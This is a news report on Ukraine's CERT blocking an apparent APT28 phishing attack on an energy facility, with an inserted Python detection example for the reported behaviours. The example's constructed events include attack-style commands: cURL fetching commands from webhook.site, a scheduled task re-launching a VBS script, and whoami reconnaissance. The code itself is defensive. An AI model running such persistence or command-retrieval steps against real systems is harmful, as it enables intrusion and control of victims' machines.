A Major APT28 Cyberattack on Critical Energy Infrastructure Thwarted by Ukraine’s CERT

An unnamed critical energy infrastructure facility in Ukraine was the target of a cyberattack that was successfully thwarted, according to a report released on Tuesday by the Computer Emergency Response Team of Ukraine (CERT-UA).

According to the agency, the attack began with a phishing email containing a link to a malicious ZIP archive, which kicked off the infection chain.

According to CERT-UA, clicking the link causes a ZIP archive to be downloaded to the victim’s PC containing three JPG images (decoys) and a BAT file named “weblinks.cmd”. CERT-UA attributed the attack to the Russian threat actor APT28, also known as BlueDelta, Fancy Bear, Forest Blizzard, or FROZENLAKE.

Once the CMD file is executed, the attack chain opens a number of decoy web pages, generates .bat and .vbs files, and runs a VBS script that in turn launches a BAT file.

Following this step, the attackers run the “whoami” command to collect information about the compromised system and exfiltrate it. At the same time, they download a TOR hidden service to route malicious traffic through.

Persistence is maintained through a scheduled task, and remote command execution is enabled via cURL requests to the legitimate service webhook.site, which has recently been linked to the threat actor Dark Pink.

The attempt was unsuccessful, according to CERT-UA, because access to Mocky and the Windows Script Host (wscript.exe) was blocked. Notably, APT28 has previously been linked to the use of Mocky APIs.
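The behaviours described above (a .cmd that spawns Windows Script Host from a user-writable path, cURL reaching out to webhook.site or Mocky, a scheduled task that re-launches a script host, and whoami run from a script rather than an interactive console) translate directly into detection logic for process-creation telemetry. The following is an added example, not code from CERT-UA or from the article; the events are constructed, the field layout loosely follows a Sysmon Event ID 1 record, and the domain `mocky.io` for the Mocky service and the `<token-placeholder>` path are assumptions, not indicators from the report.

```python
"""Added example: flag process-creation events matching the behaviours the
CERT-UA report describes. Sample events below are constructed, not real logs.
"""
import re
from dataclasses import dataclass

# Legitimate web services the report says were abused for command retrieval.
# webhook.site is named in the article; "mocky.io" is assumed here as the
# Mocky API host.
ABUSED_WEB_SERVICES = ("webhook.site", "mocky.io")

# Directories a phishing-delivered archive is typically extracted into.
USER_WRITABLE_PATH = re.compile(r"\\(downloads|temp|appdata)\\")


@dataclass
class ProcessEvent:
    image: str          # full path of the executable that started
    command_line: str
    parent_image: str   # full path of the parent process


def detect(event: ProcessEvent) -> list[str]:
    """Return the names of every detection that fires for one event."""
    hits: list[str] = []
    img = event.image.lower()
    cmd = event.command_line.lower()
    parent = event.parent_image.lower()

    # 1. Windows Script Host launched by cmd.exe with a script in a user-writable
    #    path: the .cmd -> .vbs hop. Blocking wscript.exe stopped this attack.
    if img.endswith("wscript.exe") and parent.endswith("cmd.exe") and USER_WRITABLE_PATH.search(cmd):
        hits.append("wsh_from_cmd_user_path")

    # 2. cURL contacting a hosting/webhook service used to fetch commands.
    if img.endswith("curl.exe") and any(svc in cmd for svc in ABUSED_WEB_SERVICES):
        hits.append("curl_to_abused_web_service")

    # 3. Scheduled-task creation whose action re-launches a script host or cURL.
    if img.endswith("schtasks.exe") and "/create" in cmd and re.search(r"wscript|cscript|curl", cmd):
        hits.append("schtasks_persistence_script_host")

    # 4. whoami spawned by a script host (an admin at a console spawns it from
    #    cmd.exe or powershell.exe, so those parents are deliberately excluded).
    if img.endswith("whoami.exe") and parent.endswith(("wscript.exe", "cscript.exe")):
        hits.append("whoami_recon_from_script_host")

    return hits


# Constructed sample telemetry: four events modelled on the reported chain,
# plus two benign ones that must not fire.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\wscript.exe",
                 r'wscript.exe "C:\Users\victim\Downloads\photos\stage.vbs"',
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\curl.exe",
                 "curl.exe -s https://webhook.site/<token-placeholder>",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\schtasks.exe",
                 r'schtasks.exe /create /tn Updater /sc minute /tr "wscript.exe C:\Users\victim\AppData\Local\u.vbs"',
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\whoami.exe", "whoami",
                 r"C:\Windows\System32\wscript.exe"),
    ProcessEvent(r"C:\Program Files\Browser\browser.exe", "browser.exe",
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\whoami.exe", "whoami /all",
                 r"C:\Windows\System32\cmd.exe"),
]


def run_sample() -> list[list[str]]:
    """Evaluate every constructed event and return the hits per event."""
    return [detect(e) for e in SAMPLE_EVENTS]


if __name__ == "__main__":
    for event, hits in zip(SAMPLE_EVENTS, run_sample()):
        print(f"{event.image:<45} -> {hits or 'no detection'}")
```

Each rule keys on a parent/child relationship or a destination rather than on a file name, so renaming “weblinks.cmd” does not evade it; the trade-off is that rule 4 deliberately ignores whoami launched from cmd.exe, which is routine administrator activity.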

The disclosure comes amid an ongoing wave of phishing attacks targeting Ukraine, some of which have been found to distribute AsyncRAT using the commercial malware obfuscation tool ScrubCrypt.

By Abdul Wahab